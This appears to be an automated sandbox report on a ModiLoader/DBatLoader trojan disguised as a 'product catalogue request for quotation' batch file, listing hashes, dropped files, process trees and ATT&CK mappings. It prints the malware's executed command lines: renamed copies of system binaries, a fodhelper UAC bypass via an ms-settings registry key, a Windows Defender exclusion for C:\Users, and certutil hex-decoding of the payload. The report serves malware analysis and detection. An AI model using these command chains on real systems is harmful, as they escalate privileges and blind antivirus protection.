modiloader | c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1

General

Target

PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Size

4.4MB
MD5

a9f2c8cc828e683395e9a804c120021e
SHA1

6b1f7e910df1792b94690045d3de345cff297ff3
SHA256

c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
SHA512

c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
SSDEEP

49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2420-55-0x0000000002E50000-0x0000000003E50000-memory.dmp	modiloader_stage2

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2096	alpha.exe
2592	alpha.exe
2808	alpha.exe
2584	xkn.exe
2496	alpha.exe
2472	alpha.exe
2508	kn.exe
2876	alpha.exe
2492	kn.exe
2420	Lewxa.com
1700	alpha.exe
1604	alpha.exe
2728	alpha.exe
2748	alpha.exe
524	alpha.exe
592	alpha.exe

Loads dropped DLL 9 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exeWerFault.exe

pid process

2908 cmd.exe
2908 cmd.exe
2908 cmd.exe
2808 alpha.exe
2584 xkn.exe
2584 xkn.exe
2472 alpha.exe
2776 WerFault.exe
2776 WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2776 2420 WerFault.exe Lewxa.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2780 taskkill.exe
756 taskkill.exe

pid	process
2908	cmd.exe
2908	cmd.exe
2908	cmd.exe
2808	alpha.exe
2584	xkn.exe
2584	xkn.exe
2472	alpha.exe
2776	WerFault.exe
2776	WerFault.exe

pid	pid_target	process	target process
2776	2420	WerFault.exe	Lewxa.com

pid	process
2780	taskkill.exe
756	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2440 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

2420 Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2584 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2584 xkn.exe
Token: SeDebugPrivilege 2780 taskkill.exe
Token: SeDebugPrivilege 756 taskkill.exe

pid	process
2440	reg.exe

pid	process
2420	Lewxa.com

pid	process
2584	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2584	xkn.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2908 wrote to memory of 2904	2908	cmd.exe	cmd.exe
PID 2908 wrote to memory of 2904	2908	cmd.exe	cmd.exe
PID 2908 wrote to memory of 2904	2908	cmd.exe	cmd.exe
PID 2904 wrote to memory of 2736	2904	cmd.exe	extrac32.exe
PID 2904 wrote to memory of 2736	2904	cmd.exe	extrac32.exe
PID 2904 wrote to memory of 2736	2904	cmd.exe	extrac32.exe
PID 2908 wrote to memory of 2096	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2096	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2096	2908	cmd.exe	alpha.exe
PID 2096 wrote to memory of 2992	2096	alpha.exe	extrac32.exe
PID 2096 wrote to memory of 2992	2096	alpha.exe	extrac32.exe
PID 2096 wrote to memory of 2992	2096	alpha.exe	extrac32.exe
PID 2908 wrote to memory of 2592	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2592	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2592	2908	cmd.exe	alpha.exe
PID 2592 wrote to memory of 2688	2592	alpha.exe	extrac32.exe
PID 2592 wrote to memory of 2688	2592	alpha.exe	extrac32.exe
PID 2592 wrote to memory of 2688	2592	alpha.exe	extrac32.exe
PID 2908 wrote to memory of 2808	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2808	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2808	2908	cmd.exe	alpha.exe
PID 2808 wrote to memory of 2584	2808	alpha.exe	xkn.exe
PID 2808 wrote to memory of 2584	2808	alpha.exe	xkn.exe
PID 2808 wrote to memory of 2584	2808	alpha.exe	xkn.exe
PID 2584 wrote to memory of 2496	2584	xkn.exe	alpha.exe
PID 2584 wrote to memory of 2496	2584	xkn.exe	alpha.exe
PID 2584 wrote to memory of 2496	2584	xkn.exe	alpha.exe
PID 2496 wrote to memory of 2440	2496	alpha.exe	reg.exe
PID 2496 wrote to memory of 2440	2496	alpha.exe	reg.exe
PID 2496 wrote to memory of 2440	2496	alpha.exe	reg.exe
PID 2908 wrote to memory of 2472	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2472	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2472	2908	cmd.exe	alpha.exe
PID 2472 wrote to memory of 2508	2472	alpha.exe	kn.exe
PID 2472 wrote to memory of 2508	2472	alpha.exe	kn.exe
PID 2472 wrote to memory of 2508	2472	alpha.exe	kn.exe
PID 2908 wrote to memory of 2876	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2876	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2876	2908	cmd.exe	alpha.exe
PID 2876 wrote to memory of 2492	2876	alpha.exe	kn.exe
PID 2876 wrote to memory of 2492	2876	alpha.exe	kn.exe
PID 2876 wrote to memory of 2492	2876	alpha.exe	kn.exe
PID 2908 wrote to memory of 2420	2908	cmd.exe	Lewxa.com
PID 2908 wrote to memory of 2420	2908	cmd.exe	Lewxa.com
PID 2908 wrote to memory of 2420	2908	cmd.exe	Lewxa.com
PID 2908 wrote to memory of 2420	2908	cmd.exe	Lewxa.com
PID 2908 wrote to memory of 1700	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 1700	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 1700	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 1604	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 1604	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 1604	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2728	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2728	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2728	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2748	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2748	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 2748	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 524	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 524	2908	cmd.exe	alpha.exe
PID 2908 wrote to memory of 524	2908	cmd.exe	alpha.exe
PID 524 wrote to memory of 2780	524	alpha.exe	taskkill.exe
PID 524 wrote to memory of 2780	524	alpha.exe	taskkill.exe
PID 524 wrote to memory of 2780	524	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2904

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2736

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2992

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2688

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2808

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2440

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:2508

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2876

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:2492

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 732
3⤵
- Loads dropped DLL
- Program crash
PID:2776

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1700

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1604

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2728

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2748

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:592

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:756

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt
Filesize
3.1MB

MD5
aecbd8ff910c38b1772994a46cf4dcee

SHA1
96e1b7e276e7b19150c259a344e45b9fa04fac43

SHA256
f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33

SHA512
2919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18

Download Submit
C:\Users\Public\Libraries\Lewxa.com
Filesize
1.5MB

MD5
6babecb95e226aef5eef6f80111e04de

SHA1
f2974245b3391f9be136fdf76df36cc5ad0bed2d

SHA256
a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0

SHA512
109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949

Download Submit
\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2420-59-0x0000000000400000-0x0000000000596000-memory.dmp

Filesize
1.6MB

Download
memory/2420-58-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2420-55-0x0000000002E50000-0x0000000003E50000-memory.dmp

Filesize
16.0MB

Download
memory/2420-49-0x0000000002E50000-0x0000000003E50000-memory.dmp

Filesize
16.0MB

Download
memory/2420-46-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2584-24-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2584-33-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-28-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2584-27-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-26-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2584-25-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2584-23-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2584-22-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-21-0x000000001B150000-0x000000001B432000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads